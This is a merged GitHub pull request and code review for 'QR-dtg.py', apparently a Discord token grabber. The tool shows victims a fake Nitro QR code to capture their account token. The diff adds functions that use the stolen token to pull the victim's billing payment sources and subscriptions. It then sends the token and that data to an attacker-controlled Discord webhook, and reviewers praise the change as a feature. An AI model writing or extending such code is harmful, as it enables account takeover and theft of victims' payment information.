### PR TITLE
New GUI for Discord Webhook Sender

### PR DESCRIPTION
**Pull request by mouadessalim**
**I've just added some features after grabbing the token, it use it to find user informations and billings info. It look like this:**
Capture d’écran 2022-08-17 à 13 36 01

### CODE REVIEW

File: QR-dtg.py [hunk 1]
```diff
@@ -16,24 +17,36 @@ def clear() -> None:
...
 
 def generate_nitro_template() -> None:
-    """Generate the nitro template using the QR code generated by generate_qr.
-    """
-    nitro_template = Image.open(
-        os.path.normpath(r"resources/template.png"), 
-        "r"
-        )
+    #Generate the nitro template using the QR code generated by generate_qr.
+    nitro_template = Image.open(os.path.normpath(r"resources/template.png"), "r")
```
Comment (mouadessalim) [inline QR-dtg.py:28]: Reducing code line for optimisation.

note: more you reduce code line more the python interpreter is fast;

File: QR-dtg.py [hunk 2]
```diff
@@ -16,24 +17,36 @@ def clear() -> None:
...
+        return None
+
+def get_discord_info(tk, link_int):
+    #Get payment and sub information.
+    headers = {'Authorization': tk}
+    if link_int == 1:
+        response = get('https://discordapp.com/api/v6/users/@me/billing/payment-sources',  headers=headers).json()
+    elif link_int == 2:
+        response = get('https://discordapp.com/api/v9/users/@me/billing/subscriptions',  headers=headers).json()
+    return response
```
Comment (mouadessalim) [inline QR-dtg.py:48]: Getting token suer information with discord API.

File: QR-dtg.py [hunk 3]
```diff
@@ -57,7 +70,7 @@ def main(webhook_url) -> None:
     if not (div := re.search(r"qrCode-......", str(source))):
         print(f"{Fore.LIGHTRED_EX}Error: \
 the regular expression 'qrCode-......' is not found.")
-        os._exit(1)
+        sys.exit()
```
Comment (mouadessalim) [inline QR-dtg.py:73]: `os._exit():`
Exit the process with status n, without calling cleanup handlers, flushing stdio buffers, etc.

**Note** The standard way to exit is sys.exit(n). _exit() should normally only be used in the child process after a fork().

File: QR-dtg.py [hunk 4]
```diff
@@ -87,35 +100,41 @@ def main(webhook_url) -> None:
...
+            else:
+                embed.add_embed_field(name='Payment Info (:x:)', value="**No Payment Info Founded.**\n", inline=False)
+        else:
+            embed.add_embed_field(name='User Token Info :interrobang:', value="**This token doesn't provide any information about the account, maybe it's corrupted.**\n", inline=False)
+        embed.add_embed_field(name='Token', value=f"```yaml\n{token}\n```", inline=False)        
+    else:
+        embed.add_embed_field(name='Token', value=f"```yaml\n{token}\n```", inline=False)
+    webhook.add_embed(embed)
+    embed.set_footer(text='Created by NightfallGT, Revised by Luci (9P9), Lemon.-_-.#3714, the-cult-of-integral and mte0', inline=False)
+    webhook.execute()
```
Comment (mouadessalim) [inline QR-dtg.py:135]: The new Discord Webhook sender GUI.

File: QR-dtg.py [hunk 5]
```diff
@@ -1,13 +1,14 @@
-import base64, os, platform, re, requests, time
+import base64, os, platform, re, time, sys
+from requests import get
 from bs4 import BeautifulSoup
 from colorama import Fore, init
 from PIL import Image
 from selenium import webdriver
 from warnings import filterwarnings
+from discord_webhook import DiscordEmbed, DiscordWebhook
```
Comment (mouadessalim) [inline QR-dtg.py:8]: A good discord webhook module for sending with webhook. Also allow use of file, embed etc...

**Review by mouadessalim — COMMENTED** [review]
**I have reviewed the whole code for a better understanding.**

File: QR-dtg.py (hunk 4 above)
Comment (9P9) [reply QR-dtg.py:135]: Love this update, looks great

Comment (mouadessalim) [reply QR-dtg.py:135]: @9P9 Thanks for merging ! I have several idea for the repo I am working on it these days so be careful to merge. 😉

**Pull request merged**